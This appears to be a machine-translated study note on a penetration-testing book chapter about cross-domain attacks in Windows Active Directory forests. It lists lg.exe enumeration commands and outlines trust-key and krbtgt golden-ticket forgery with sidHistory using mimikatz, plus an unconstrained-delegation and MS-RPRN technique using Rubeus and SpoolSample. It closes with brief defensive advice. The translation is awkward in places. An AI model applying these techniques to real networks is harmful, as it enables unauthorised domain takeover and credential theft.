Preface

Continue reading and learning this article 《 Intranet security attack and defense ： Penetration test practice guide 》, This chapter is about cross domain attack analysis and defense , This paper analyzes the typical methods of cross domain attack using domain trust relationship , It also gives some suggestions on how to deploy a secure intranet production environment , The content is very brief

Large enterprises generally share resources through domain forests

• Departments divided according to different functions , Logically, it is divided into main domain and sub domain , To facilitate unified management
• At the physical level , Firewalls are usually used to divide subsidiaries and departments into different areas
• If the attacker gets the domain controller of a subsidiary or department , But I didn't get all the permissions of the intranet of the whole company （ Or the required resources are not in this domain ）, Often find ways to get other departments （ Or domain ） Authority

One 、 Cross domain attack methods

Common cross domain attack methods are ：

• Conventional penetration methods （ For example, using Web Vulnerability cross domain access ）
• Hash delivery attack or ticket delivery attack using known domain hash value （ for example DC Your local administrator password is the same ）
• Cross domain attacks using domain trust relationships

Two 、 Cross domain attack using domain trust relationship

1、 Introduction to domain trust

The role of domain trust is to solve the problem of cross domain resource sharing in multi domain environment

• By default , given Windows All users in the domain can be authenticated through the resources in the domain
• The domain environment will not unconditionally accept credentials from other domains , If the user wants to access resources outside the current domain boundary , Domain trust is required
• Domain trust is a mechanism of domain , Allow users in another domain to access resources in this domain after authentication
• from Windows server 2003 Start , The domain trust relationship becomes bidirectional , And can be transmitted through trust relationship
• Only Domain Admins Users in a group can manage domain trust relationships

2、 Get domain information

In the domain ,Enterprise Admins Group （ Only in the root domain of the forest ） Members of have full control over all domains in the forest . By default , This group contains all domain controllers in the forest that have Administrator Members of the authority

Use LG.exe This tool , Information that can be used to enumerate remote host users and groups

// Enumerate user groups in a domain 
lg.exe <domain name>\.

// Enumerate the local group users of the remote machine 
lg.exe \\dc

// Get all remote users in SID
lg.exe \\dc -lu -sidsout

// Gets the name of all members in the specified group SID
lg.exe \\dc\administrators -sidsout

3、 Use the domain trust key （NTLM Hash） Get permissions for the target domain

utilize mimikatz Export the trust secret key and forge the trust ticket （ have sidHistory）、 utilize asktgs request TGS、 utilize kirbikator take TGS Information is injected into memory , Get permissions for the target domain .

Use mimikatz You can set... When building gold notes sidHistory, therefore , If the attacker obtains the... Of any domain krbtgt Hash value , You can use it sidHistory Get full permissions for the forest .

4、 utilize krbtgt The hash value gets the permissions of the target domain

stay DC Upper use mimikatz obtain krbtgt Hash value 、 Use ordinary user permissions to construct and inject gold notes in the sub domain , Get permissions for the target domain

5、 Leverage unrestricted delegation and MS-RPRN Get trust permissions

If the attacker has obtained the permission of a domain controller in the domain forest or configured the permission of any server with unrestricted delegation
jurisdiction , You can use MS-RPRN Make the domain controller of the trust forest send authentication request to the server that has been controlled , Use the captured ticket to obtain the hash value of any user in the trust forest

Two tools ：

• Rubeus Monitor authentication requests ：https://github.com/GhostPack/Rubeus
• SpoolSample Send authentication request ：https://github.com/leechristensen/SpoolSample

3、 ... and 、 Prevent cross domain attacks

Extranet Web Often configure WAF And regular safety inspection by maintenance personnel , And Intranet Web（ Internal office 、 Test server, etc ） More vulnerable , There are often weak passwords and vulnerabilities that are not patched in time

In many companies , Although different domains are divided for different departments , But domain administrators may be the same people , Therefore, the user name and password of the domain administrator may be the same

Therefore, it is important to check DC Whether the local administrator password of is the same as that of other domains DC The local administrator password is the same

Conclusion

This chapter is brief , It mainly uses domain trust relationship to realize cross domain attack